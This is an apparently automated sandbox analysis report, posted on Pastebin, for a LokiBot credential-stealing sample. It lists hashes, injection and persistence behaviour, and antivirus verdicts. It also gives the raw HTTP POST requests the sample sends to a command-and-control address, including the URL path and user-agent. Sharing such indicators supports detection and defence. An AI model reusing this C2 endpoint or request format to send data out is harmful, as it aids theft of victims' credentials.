Advertisement
paladin316

Exes_b291aa7c12235281eb62987999f7a25c_exe_2019-08-28_07_30.txt

Aug 28th, 2019
1,601
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.17 KB | None | 0 0
  1.  
  2. * MalFamily: "Loki"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_b291aa7c12235281eb62987999f7a25c.exe"
  7. * File Size: 643072
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "8892d6a52fe967544b572982a24528b9dbcc513a51c350588fdfb5f5ebb30593"
  10. * MD5: "b291aa7c12235281eb62987999f7a25c"
  11. * SHA1: "0894b3fbf57578e474256c86650c8fb1f8eb6e41"
  12. * SHA512: "04f3ba2bc118df5765680d32eca03cd93429a8e8dde2e28489275f538358043a3d55b57c4b5e3a051bafc77a2910ae51554cc9e01fe2576978c815cc80705ec9"
  13. * CRC32: "BB0986CF"
  14. * SSDEEP: "12288:R6F+5vH/aqXX9MII5e5wdTFTqr51YggtE:SMqqHa5ywHTqHPgt"
  15.  
  16. * Process Execution:
  17. "HGJN3.exe"
  18.  
  19.  
  20. * Executed Commands:
  21. "\"C:\\Users\\user\\AppData\\Local\\Temp\\HGJN3.exe\""
  22.  
  23.  
  24. * Signatures Detected:
  25.  
  26. "Description": "Behavioural detection: Executable code extraction",
  27. "Details":
  28.  
  29.  
  30. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  31. "Details":
  32.  
  33. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  34.  
  35.  
  36. "http_version_old": "HTTP traffic uses version 1.0"
  37.  
  38.  
  39. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  40.  
  41.  
  42. "suspicious_request": "http://101.99.90.11/lok/second/boy/fre.php"
  43.  
  44.  
  45.  
  46.  
  47. "Description": "Performs some HTTP requests",
  48. "Details":
  49.  
  50. "url": "http://101.99.90.11/lok/second/boy/fre.php"
  51.  
  52.  
  53.  
  54.  
  55. "Description": "The binary likely contains encrypted or compressed data.",
  56. "Details":
  57.  
  58. "section": "name: .text, entropy: 7.76, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x00085000, virtual_size: 0x00084ee0"
  59.  
  60.  
  61. "section": "name: .rsrc, entropy: 7.42, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00016000, virtual_size: 0x00015374"
  62.  
  63.  
  64.  
  65.  
  66. "Description": "Behavioural detection: Injection (Process Hollowing)",
  67. "Details":
  68.  
  69. "Injection": "HGJN3.exe(3880) -> None(9384)"
  70.  
  71.  
  72.  
  73.  
  74. "Description": "Executed a process and injected code into it, probably while unpacking",
  75. "Details":
  76.  
  77. "Injection": "HGJN3.exe(3880) -> None(9384)"
  78.  
  79.  
  80.  
  81.  
  82. "Description": "Behavioural detection: Injection (inter-process)",
  83. "Details":
  84.  
  85.  
  86. "Description": "Installs itself for autorun at Windows startup",
  87. "Details":
  88.  
  89. "file": "C:\\Windows\\win.ini"
  90.  
  91.  
  92. "file": "C:\\Windows\\win.ini"
  93.  
  94.  
  95.  
  96.  
  97. "Description": "CAPE detected the Loki malware family",
  98. "Details":
  99.  
  100.  
  101. "Description": "File has been identified by 18 Antiviruses on VirusTotal as malicious",
  102. "Details":
  103.  
  104. "Malwarebytes": "Spyware.AgentTesla"
  105.  
  106.  
  107. "VIPRE": "Trojan.Win32.Generic!BT"
  108.  
  109.  
  110. "Cybereason": "malicious.bf5757"
  111.  
  112.  
  113. "Symantec": "ML.Attribute.HighConfidence"
  114.  
  115.  
  116. "APEX": "Malicious"
  117.  
  118.  
  119. "Paloalto": "generic.ml"
  120.  
  121.  
  122. "Rising": "Trojan.Injector!1.B459 (CLASSIC)"
  123.  
  124.  
  125. "Invincea": "heuristic"
  126.  
  127.  
  128. "McAfee-GW-Edition": "BehavesLike.Win32.Generic.jc"
  129.  
  130.  
  131. "Trapmine": "malicious.moderate.ml.score"
  132.  
  133.  
  134. "FireEye": "Generic.mg.b291aa7c12235281"
  135.  
  136.  
  137. "Endgame": "malicious (high confidence)"
  138.  
  139.  
  140. "Microsoft": "Trojan:Win32/Wacatac.B!ml"
  141.  
  142.  
  143. "ESET-NOD32": "a variant of Win32/Injector.EGVX"
  144.  
  145.  
  146. "SentinelOne": "DFI - Suspicious PE"
  147.  
  148.  
  149. "eGambit": "Unsafe.AI_Score_80%"
  150.  
  151.  
  152. "CrowdStrike": "win/malicious_confidence_60% (D)"
  153.  
  154.  
  155. "Qihoo-360": "HEUR/QVM03.0.7F6B.Malware.Gen"
  156.  
  157.  
  158.  
  159.  
  160. "Description": "Created network traffic indicative of malicious activity",
  161. "Details":
  162.  
  163. "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)"
  164.  
  165.  
  166. "signature": "ET TROJAN LokiBot Fake 404 Response"
  167.  
  168.  
  169. "signature": "ET TROJAN LokiBot Checkin"
  170.  
  171.  
  172. "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2"
  173.  
  174.  
  175. "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1"
  176.  
  177.  
  178. "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1"
  179.  
  180.  
  181. "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2"
  182.  
  183.  
  184.  
  185.  
  186.  
  187. * Started Service:
  188.  
  189. * Mutexes:
  190. "CicLoadWinStaWinSta0",
  191. "Local\\MSCTF.CtfMonitorInstMutexDefault1"
  192.  
  193.  
  194. * Modified Files:
  195. "C:\\Users\\user\\AppData\\Local\\Temp\\~DFAF4EB26F9C2BBF88.TMP",
  196. "C:\\Windows\\win.ini"
  197.  
  198.  
  199. * Deleted Files:
  200.  
  201. * Modified Registry Keys:
  202.  
  203. * Deleted Registry Keys:
  204.  
  205. * DNS Communications:
  206.  
  207. * Domains:
  208.  
  209. * Network Communication - ICMP:
  210.  
  211. * Network Communication - HTTP:
  212.  
  213. "count": 2,
  214. "body": "",
  215. "uri": "http://101.99.90.11/lok/second/boy/fre.php",
  216. "user-agent": "Mozilla/4.08 (Charon; Inferno)",
  217. "method": "POST",
  218. "host": "101.99.90.11",
  219. "version": "1.0",
  220. "path": "/lok/second/boy/fre.php",
  221. "data": "POST /lok/second/boy/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 101.99.90.11\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 88A95348\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
  222. "port": 80
  223.  
  224.  
  225. "count": 1,
  226. "body": "",
  227. "uri": "http://101.99.90.11/lok/second/boy/fre.php",
  228. "user-agent": "Mozilla/4.08 (Charon; Inferno)",
  229. "method": "POST",
  230. "host": "101.99.90.11",
  231. "version": "1.0",
  232. "path": "/lok/second/boy/fre.php",
  233. "data": "POST /lok/second/boy/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 101.99.90.11\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 88A95348\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
  234. "port": 80
  235.  
  236.  
  237.  
  238. * Network Communication - SMTP:
  239.  
  240. * Network Communication - Hosts:
  241.  
  242. "country_name": "Malaysia",
  243. "ip": "101.99.90.11",
  244. "inaddrarpa": "",
  245. "hostname": ""
  246.  
  247.  
  248.  
  249. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement